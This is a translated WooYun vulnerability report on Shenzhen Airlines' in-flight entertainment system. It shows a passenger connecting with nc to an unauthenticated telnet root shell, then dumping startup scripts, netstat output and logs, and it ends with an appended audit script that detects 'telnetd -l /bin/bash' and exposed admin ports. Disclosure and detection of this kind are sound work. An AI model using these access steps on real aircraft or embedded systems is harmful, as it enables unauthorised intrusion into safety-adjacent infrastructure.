WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-09-26: Details reported to the vendor, awaiting vendor processing
2015-09-26: Vendor confirmed; details disclosed to the vendor only
2015-10-06: Details disclosed to core white hats and domain experts
2015-10-16: Details disclosed to regular white hats
2015-10-26: Details disclosed to intern white hats
2015-11-10: Details disclosed to the public
Flying is boring.
After connecting to Shenzhen Airlines' Yuntu (云图) in-flight system, I found I was on a network where Yuntu is reached through 192.168.2.99, but
nc -vv 192.168.2.2 23
found 0 associations
found 1 connections:
     1:	flags=82<CONNECTED,PREFERRED>
	outif en0
	src 192.168.2.88 port 59300
	dst 192.168.2.2 port 23
	rank info not available
	TCP aux info available
Connection to 192.168.2.2 port 23 [tcp/telnet] succeeded!
????????
bash-3.00#
What the hell is this, it just connects straight in?
netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:8554            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:8300            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 192.168.2.2:8080        192.168.2.99:60361      TIME_WAIT
tcp        0      0 192.168.2.2:8080        192.168.2.99:60440      TIME_WAIT
tcp        0      0 192.168.2.2:8080        192.168.2.99:60726      TIME_WAIT
tcp        0      0 192.168.2.2:42675       192.168.2.99:7890       ESTABLISHED
tcp        0    547 192.168.2.2:23          192.168.2.88:59300      ESTABLISHED
tcp        0      0 192.168.2.2:8080        192.168.2.99:60519      TIME_WAIT
tcp        0      0 192.168.2.2:38879       192.168.2.99:8911       ESTABLISHED
tcp        0      0 192.168.2.2:42679       192.168.2.99:7890       ESTABLISHED
tcp        0      0 192.168.2.2:8080        192.168.2.99:60596      TIME_WAIT
tcp        0      0 192.168.2.2:38878       192.168.2.99:8911       ESTABLISHED
tcp        0      0 192.168.2.2:8080        192.168.2.99:60663      TIME_WAIT
Let's look at the code.
cat *.sh
#!/bin/sh
echo "================Enter runapp.sh========================="
#start the telnetd service;
telnetd -l /bin/bash
cp /tango/pointercal /etc
#insmod the sata/usb ko
modprobe sata_tango3
modprobe tangox-ehci-hcd
modprobe usb-storage
echo "================Build /tmp/sda2 directory========================="
mkdir /tmp/sda2
mkdir /tmp/sda3
mkdir /mnt/sdk
mkdir /mnt/nfs
mount /dev/sda2 /tmp/sda2
mount /dev/sda3 /tmp/sda3
/tmp/sda2/avod/AppStart.sh

cat /tmp/sda2/avod/AppStart.sh
#!/bin/sh
if [ ! -d "/home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/" ]; then
    mkdir /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/ -p
fi
#firmware
if [ -d "/tmp/sda2/newfw" ] && [ -d "/tmp/sda2/newfw/release/avod" ] && [ -d "/tmp/sda2/newfw/sdk" ] && [ -d "/tmp/sda2/newfw/release/mini_httpd" ] && [ -d "/tmp/sda2/newfw/release/wwwroot" ] ;then #&& [ -d "/tmp/sda2/newfw/sdkavod" ]
    echo "Found new firmware..."
    rm /tmp/sda2/avod -rf
    mv /tmp/sda2/newfw/release/avod /tmp/sda2/ -f
    chmod 777 /tmp/sda2/avod -R
    if [ -d "/tmp/sda2/newfw/release/conf" ] ;then
        rm /tmp/sda2/conf -rf
        mv /tmp/sda2/newfw/release/conf /tmp/sda2/conf -f
        chmod 777 /tmp/sda2/conf -R
    fi
    rm /tmp/sda2/sdk -rf
    mv /tmp/sda2/newfw/sdk /tmp/sda2/ -f
    #Only for Browser upgrade
    if [ -d "/tmp/sda2/newfw/sdkavod" ] ;then
        rm /tmp/sda2/sdkavod/install -rf
        rm /tmp/sda2/sdkavod/lib -rf
        mv /tmp/sda2/newfw/sdkavod/install/ /tmp/sda2/sdkavod/ -f
        mv /tmp/sda2/newfw/sdkavod/lib/ /tmp/sda2/sdkavod/ -f
    fi
    # rm /tmp/sda2/sdkavod -rf
    # mv /tmp/sda2/newfw/sdkavod /tmp/sda2/ -f
    rm /tmp/sda3/mini_httpd -rf
    mv /tmp/sda2/newfw/release/mini_httpd /tmp/sda3/mini_httpd
    chmod 777 /tmp/sda3/mini_httpd -R
    rm /tmp/sda3/wwwroot -rf
    mv /tmp/sda2/newfw/release/wwwroot /tmp/sda3/wwwroot
    chmod 777 /tmp/sda3/wwwroot -R
    rm /tmp/sda2/newfw -rf
    sync
    if [ ! -d "/tango/conf/" ] ;then
        mkdir /tango/conf -p
    fi
    if [ -f "/tmp/sda2/update/system_version_info.xml" ] ;then
        cp /tmp/sda2/update/system_version_info.xml /tango/conf -f
    else
        echo "--->>ERR:can not find system version file"
    fi
    #add update kernel
    echo "begin to update firmware!"
    /tmp/sda2/avod/updatefirmware.sh
    source /tango/release/runapp.sh
    echo "Firwmare update success!"
    exit
fi
cd /tmp/sda2/sdkavod/mrua
source run.env
fw_reload
#mkdir /home/antony
ln -s /tmp/sda2/sdkavod/lib /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/lib
ln -s /tmp/sda2/sdkavod/install /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/install
export LD_LIBRARY_PATH=/home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/lib:$LD_LIBRARY_PATH
#for cmt smartlcd
#cp /tmp/sda2/avod/libdrvMrua_usb_cmt.so /lib/libdrvMrua.so
cp /tmp/sda2/avod/libdrvMrua_12inch.so /lib/libdrvMrua.so
#cp log lib
echo "copy log lib"
cp /tmp/sda2/avod/liblog.so /lib/ -f
cp /tmp/sda2/avod/libcurl.so.4 /lib/ -f
export QWS_DISPLAY=linuxfb
export QWS_SIZE=1280x800
export QWS_MOUSE_PROTO=linuxtp
cd /tmp/sda2/sdkavod/dcchd_SMP8652_3_8_2_black.mips/
source trun.env
cd /tmp/sda2/avod
# for cmt
ln -sf PD035Vx2.vmf.cmt PD035Vx2.vmf
#leib++ for parse the ipaddr from the /tango/avod/ipaddr.cfg
#/tmp/sda2/avod/ipconfig.sh
#udhcpc -q&
#use fixed ip 192.168.2.2
/sbin/ifconfig eth0 192.168.2.2 up
/tmp/sda3/mini_httpd/sbin/mini_httpd -C /tmp/sda3/mini_httpd/mini.conf &
echo "starting control module ....."
/tmp/sda2/avod/control_module &
sleep 10
route add -net 224.0.0.0 netmask 240.0.0.0 dev eth0
sleep 5
echo "starting play_sub_module ....."
/tmp/sda2/avod/play_sub_module &
sleep 10
echo "starting browser ....."
/tmp/sda2/avod/browser -size 1280x800 -qws http://127.0.0.1/cmt_welcome/welcome.html &
cp -rf /tmp/sda2/avod/ppp /etc/
cp -rf /tmp/sda2/avod/ppp/resolv.conf /etc/
cp -f /tmp/sda2/avod/pppd /usr/sbin
cp -f /tmp/sda2/avod/chat /usr/sbin
route del -net default
sleep 5
echo "start 3g_control module"
/tmp/sda2/avod/3g_control&
sleep 10
echo "starting cmt_cma_module ....."
/tmp/sda2/avod/cmt_cma_module &
echo "starting pcu_comm_module ....."
/tmp/sda2/avod/pcu_comm_module &
echo "starting upgradeModule ....."
/tmp/sda2/avod/upgradeModule &
echo "starting cmt_suu ....."
/tmp/sda2/avod/cmt_suu &
#add by hirry for ftpd
echo "star ftpd ....."
/tmp/sda2/avod/ftp/autoftpd.sh
#end by hirry for ftpd
sleep 5
modprobe snd_seq_oss
modprobe snd_pcm_oss
sleep 2
echo "starting wis-streamer ...."
/tmp/sda2/avod/wis-streamer -pcm -nv &
#cp /tmp/sda2/avod/resolv.conf /etc/ -f
LD_LIBRARY_PATH=/lib:/usr/lib/:/usr/local/lib:$LD_LIBRARY_PATH
echo "Starting logmodule ......"
/tmp/sda2/avod/logmodule_cmt &
echo "Starting bitemodule ....."
/tmp/sda2/avod/bitemodule_cmt &
echo "Starting proxysyn_mips..."
/tmp/sda2/avod/proxysyn_mips &
#echo "Starting neusoft dldir..."
#/tmp/sda3/wwwroot/neusoft/ok/dldir/dldir &
echo "Starting nginx..."
/tmp/sda3/wwwroot/nginx/sbin/nginx -p /tmp/sda3/wwwroot/nginx/ &
echo "all application booted ....."
find /tmp/sda2/avod/logs -mtime +15 -name "*log" -exec rm -f {} \;
#add copy kernel
/tmp/sda2/avod/copykernel.sh&
killall mini_httpd
So it really is a VOD (video on demand) system. Also, judging from the logs, at certain times it can reach the 10.x network.
192.168.2.99 - - [23/Sep/2015:14:53:08 +0800] "GET /Air/download/20150923000001024616.d.icup HTTP/1.1" 206 358560 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:08 +0800] "GET /Air/checkFileSize/20150923000001024615.d.icup HTTP/1.1" 200 7 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:09 +0800] "GET /Air/checkFileSize/20150923000001024616.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "GET /Air/download/20150923000001024617.d.icup HTTP/1.1" 206 163522 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "GET /Air/checkFileSize/20150923000001024617.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024617.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:12 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024615.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:13 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024616.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:41 +0800] "GET /Air/download/20150923000001024619.d.icup HTTP/1.1" 206 343755 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:42 +0800] "GET /Air/download/20150923000001024618.d.icup HTTP/1.1" 206 540360 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:44 +0800] "GET /Air/checkFileSize/20150923000001024619.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:44 +0800] "GET /Air/checkFileSize/20150923000001024618.d.icup HTTP/1.1" 200 7 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:45 +0800] "GET /Air/download/20150923000001024620.d.icup HTTP/1.1" 206 452793 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:46 +0800] "GET /Air/checkFileSize/20150923000001024620.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:47 +0800] "GET /Air/download/20150923000001024622.d.icup HTTP/1.1" 206 98965 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:48 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024620.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:48 +0800] "GET /Air/checkFileSize/20150923000001024622.d.icup HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
telnetd -l /bin/bash
Is this a backdoor?
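An added audit example, not part of the original report or of the device's firmware: it checks a constructed copy of a startup script for the `telnetd -l <shell>` pattern seen in runapp.sh above, and a constructed `netstat -an` listing for cleartext admin ports bound to every interface as in the listing above. The sample inputs and the function names are my own.

```sh
#!/bin/sh
# Added audit example (not the device's own script): flags the two findings
# in this report, an unauthenticated telnetd and admin ports open to the cabin LAN.

# Constructed sample startup script, modelled on the runapp.sh quoted above.
SAMPLE_SCRIPT='#!/bin/sh
#start the telnetd service;
telnetd -l /bin/bash
/sbin/ifconfig eth0 192.168.2.2 up
/tmp/sda3/mini_httpd/sbin/mini_httpd -C /tmp/sda3/mini_httpd/mini.conf &'

# Constructed sample of "netstat -an", modelled on the listing quoted above.
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8554 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN
tcp 0 0 192.168.2.2:23 192.168.2.88:59300 ESTABLISHED'

# Print each line that starts telnetd with -l pointing at a shell rather than
# /bin/login (busybox's default): that is a passwordless root shell on port 23.
# Fix: remove the line, or at minimum use "telnetd -l /bin/login" so credentials are required.
find_unauth_telnet() {
    printf '%s\n' "$1" | grep -E '^[[:space:]]*telnetd[[:space:]].*-l[[:space:]]+/bin/(ba|a|da)?sh([[:space:]]|$)'
}

# Print the port of every TCP listener bound to all interfaces (0.0.0.0 or ::),
# i.e. reachable from the passenger network, not only from the device itself.
wildcard_listeners() {
    printf '%s\n' "$1" | awk '$1 == "tcp" && $6 == "LISTEN" && $4 ~ /^(0\.0\.0\.0|::):/ {
        n = split($4, a, ":"); print a[n] }'
}

# Of those, report the cleartext admin services (21 ftp, 23 telnet) that should
# never face a passenger segment; exits 0 and prints them when any is found.
exposed_cleartext_admin() {
    wildcard_listeners "$1" | grep -Ex '21|23'
}

# Stand-alone run: print the findings for the constructed samples.
echo "unauthenticated telnetd lines:"; find_unauth_telnet "$SAMPLE_SCRIPT"
echo "cleartext admin ports on all interfaces:"; exposed_cleartext_admin "$SAMPLE_NETSTAT"
```

Point the two functions at the real init script and a saved `netstat -an` from a device to use it as a pre-deployment check.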
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-09-26 13:59
Thank you for your concern about Shenzhen Airlines' information systems; staff have been assigned to fix it.
None yet